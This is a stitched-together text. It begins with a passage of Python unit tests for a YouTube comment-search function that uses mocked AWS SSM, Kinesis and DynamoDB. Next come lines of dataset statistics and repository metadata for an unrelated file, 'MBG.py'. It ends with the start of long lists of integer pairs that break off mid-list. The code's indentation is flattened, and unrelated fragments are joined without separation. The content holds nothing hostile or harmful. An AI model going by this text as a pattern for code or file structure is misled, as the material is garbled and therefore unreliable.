"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.side_effect = [
{
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": "fakeToken",
},
{
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
},
]
    assert search_comments(event) is None
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_replies(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": (current_time - timedelta(days=2)).isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
"replies": {
"comments": [
{
"id": "fakeCommentId#fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
}
]
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
    assert search_comments(event) is None
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_not_publishing_record(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": current_time.isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
# stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"publishedAt": (current_time - timedelta(days=3)).strftime(api_response_time_format),
"updatedAt": (current_time - timedelta(days=2)).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
    assert search_comments(event) is None
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_api_throws_error(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
ddb_setup(os.environ["TARGET_DDB_TABLE"])
kds_client = stream_setup(os.environ["STREAM_NAME"])
video_id = "fakeVideoId"
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
import googleapiclient.errors
import mock
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.side_effect = (
googleapiclient.errors.HttpError(mock.Mock(status=403), "Error invoking API".encode("utf-8"))
)
    assert search_comments(event) is None
def test_update_text_comment():
current_time = datetime.now(timezone.utc)
comment = Comment(
{
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Fake Text",
"textOriginal": "Fake Text",
"videoId": "fakeVideoId",
"viewerRating": 2,
"likeCount": 0,
"publishedAt": (current_time - timedelta(days=3)).strftime(api_response_time_format),
"updatedAt": (current_time - timedelta(days=2)).strftime(api_response_time_format),
},
}
)
updated_text = "new fake text"
new_comment = comment.update_comment_text(updated_text)
assert updated_text == new_comment.text
assert new_comment.comment_id == comment.comment_id
assert new_comment.viewer_rating == comment.viewer_rating
new_comment = comment.update_comment_text(updated_text, 2)
assert new_comment.comment_id == f"{comment.comment_id}#2"
def test_get_split_comments():
current_time = datetime.now(timezone.utc)
comment_text = ""
for index in range(500):
comment_text += "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. "
comment = Comment(
{
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"textDisplay": "Fake Text",
"textOriginal": comment_text,
"videoId": "fakeVideoId",
"viewerRating": 2,
"likeCount": 0,
"publishedAt": (current_time - timedelta(days=3)).strftime(api_response_time_format),
"updatedAt": (current_time - timedelta(days=2)).strftime(api_response_time_format),
},
}
)
split_comment = comment.get_split_comments()
assert len(split_comment) > 10
split_text = slice_text_into_arrays(comment_text)
assert split_text[1] == split_comment[1].text
def test_slice_text_into_arrays():
comment_text = ""
for index in range(500):
comment_text += "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. "
split_comment_text = slice_text_into_arrays(comment_text)
assert split_comment_text[0] == comment_text[0:1250]
assert split_comment_text[1] == comment_text[1250:2500]
assert split_comment_text[2] == comment_text[2500:3750]
assert comment_text == "".join(split_comment_text)
| 37.388781
| 150
| 0.509933
| 1,722
| 19,330
| 5.486643
| 0.144019
| 0.02445
| 0.028154
| 0.037786
| 0.848116
| 0.839754
| 0.837743
| 0.830758
| 0.821232
| 0.811706
| 0
| 0.02204
| 0.356855
| 19,330
| 516
| 151
| 37.46124
| 0.737934
| 0.063114
| 0
| 0.735023
| 0
| 0.004608
| 0.245015
| 0.046101
| 0
| 0
| 0
| 0
| 0.036866
| 1
| 0.020737
| false
| 0
| 0.025346
| 0
| 0.046083
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be6e4da3e4118bfced5eaaa8b3c591c341c2fa31
| 102,012
|
py
|
Python
|
MBG.py
|
mathmanda/SGTCode
|
fc4c6591e8c6ab190a15e029493562bb9cab3fee
|
[
"MIT"
] | null | null | null |
MBG.py
|
mathmanda/SGTCode
|
fc4c6591e8c6ab190a15e029493562bb9cab3fee
|
[
"MIT"
] | null | null | null |
MBG.py
|
mathmanda/SGTCode
|
fc4c6591e8c6ab190a15e029493562bb9cab3fee
|
[
"MIT"
] | null | null | null |
mb = [[1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 12],[ 1 , 13],[ 1 , 14],[ 1 , 15],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 12],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 12],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 12],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 13],[ 5 , 16],[ 5 , 19],[ 5 , 20],[ 5 , 22],[ 5 , 25],[ 5 , 26],[ 5 , 28],[ 5 , 29],[ 5 , 31],[ 6 , 13],[ 6 , 16],[ 6 , 19],[ 6 , 20],[ 6 , 22],[ 6 , 25],[ 6 , 26],[ 6 , 28],[ 6 , 29],[ 6 , 31],[ 7 , 13],[ 7 , 16],[ 7 , 19],[ 7 , 20],[ 7 , 22],[ 7 , 25],[ 7 , 26],[ 7 , 28],[ 7 , 29],[ 7 , 31],[ 8 , 14],[ 8 , 17],[ 8 , 19],[ 8 , 21],[ 8 , 23],[ 8 , 25],[ 8 , 27],[ 8 , 28],[ 8 , 30],[ 8 , 31],[ 9 , 15],[ 9 , 18],[ 9 , 20],[ 9 , 21],[ 9 , 24],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 30],[ 9 , 31],[ 10 , 15],[ 10 , 18],[ 10 , 20],[ 10 , 21],[ 10 , 24],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 30],[ 10 , 31],[ 11 , 15],[ 11 , 18],[ 11 , 20],[ 11 , 21],[ 11 , 24],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 30],[ 11 , 31]],[ [1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 1 , 32],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 26],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 5 , 38],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 
26],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 9 , 39],[ 9 , 40],[ 9 , 41],[ 10 , 23],[ 10 , 27],[ 10 , 28],[ 10 , 29],[ 10 , 33],[ 10 , 34],[ 10 , 35],[ 10 , 39],[ 10 , 40],[ 10 , 41],[ 11 , 23],[ 11 , 27],[ 11 , 28],[ 11 , 29],[ 11 , 33],[ 11 , 34],[ 11 , 35],[ 11 , 39],[ 11 , 40],[ 11 , 41],[ 12 , 23],[ 12 , 27],[ 12 , 28],[ 12 , 29],[ 12 , 33],[ 12 , 34],[ 12 , 35],[ 12 , 39],[ 12 , 40],[ 12 , 41],[ 13 , 24],[ 13 , 27],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 13 , 40],[ 13 , 42],[ 14 , 24],[ 14 , 27],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 14 , 42],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 15 , 41],[ 15 , 42],[ 16 , 25],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 16 , 41],[ 16 , 42],[ 17 , 25],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 17 , 41],[ 17 , 42],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 41],[ 18 , 42],[ 19 , 26],[ 19 , 29],[ 19 , 31],[ 19 , 32],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 40],[ 19 , 41],[ 19 , 42],[ 20 , 26],[ 20 , 29],[ 20 , 31],[ 20 , 32],[ 20 , 35],[ 20 , 37],[ 20 , 38],[ 20 , 40],[ 20 , 41],[ 20 , 42],[ 21 , 26],[ 21 , 29],[ 21 , 31],[ 21 , 32],[ 21 , 35],[ 21 , 37],[ 21 , 38],[ 21 , 40],[ 21 , 41],[ 21 , 42],[ 22 , 26],[ 22 , 29],[ 22 , 31],[ 22 , 32],[ 22 , 35],[ 22 , 37],[ 22 , 38],[ 22 , 40],[ 22 , 41],[ 22 , 42]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 
36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 18],[ 10 , 22],[ 10 , 23],[ 10 , 24],[ 10 , 28],[ 10 , 29],[ 10 , 30],[ 10 , 34],[ 10 , 35],[ 10 , 36],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 20],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 1 , 32],[ 1 , 33],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 2 , 33],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 24],[ 5 , 25],[ 5 , 26],[ 5 , 27],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 5 , 38],[ 5 , 39],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 27],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 6 , 39],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 27],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 7 , 39],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 27],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 8 , 39],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 9 , 40],[ 9 , 41],[ 9 , 42],[ 10 , 24],[ 10 , 28],[ 10 , 29],[ 10 , 30],[ 10 , 34],[ 10 , 35],[ 10 , 36],[ 10 , 40],[ 10 , 41],[ 10 , 42],[ 11 , 24],[ 11 , 28],[ 11 , 29],[ 11 , 30],[ 11 , 34],[ 11 , 35],[ 11 , 36],[ 11 , 40],[ 11 , 41],[ 11 , 42],[ 12 , 24],[ 12 , 28],[ 12 , 29],[ 12 , 30],[ 12 , 34],[ 12 , 35],[ 12 , 36],[ 12 , 40],[ 12 , 41],[ 12 , 42],[ 13 , 25],[ 13 , 28],[ 13 , 31],[ 13 , 32],[ 13 , 34],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 13 , 41],[ 13 , 43],[ 14 , 25],[ 14 , 28],[ 14 , 31],[ 14 , 32],[ 14 , 34],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 14 , 41],[ 14 , 43],[ 15 , 25],[ 15 , 28],[ 15 , 31],[ 15 , 32],[ 15 , 34],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 15 , 43],[ 16 , 26],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 
39],[ 16 , 40],[ 16 , 42],[ 16 , 43],[ 17 , 26],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 17 , 42],[ 17 , 43],[ 18 , 26],[ 18 , 29],[ 18 , 31],[ 18 , 33],[ 18 , 35],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 42],[ 18 , 43],[ 19 , 26],[ 19 , 29],[ 19 , 31],[ 19 , 33],[ 19 , 35],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 42],[ 19 , 43],[ 20 , 27],[ 20 , 30],[ 20 , 32],[ 20 , 33],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 41],[ 20 , 42],[ 20 , 43],[ 21 , 27],[ 21 , 30],[ 21 , 32],[ 21 , 33],[ 21 , 36],[ 21 , 38],[ 21 , 39],[ 21 , 41],[ 21 , 42],[ 21 , 43],[ 22 , 27],[ 22 , 30],[ 22 , 32],[ 22 , 33],[ 22 , 36],[ 22 , 38],[ 22 , 39],[ 22 , 41],[ 22 , 42],[ 22 , 43],[ 23 , 27],[ 23 , 30],[ 23 , 32],[ 23 , 33],[ 23 , 36],[ 23 , 38],[ 23 , 39],[ 23 , 41],[ 23 , 42],[ 23 , 43]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 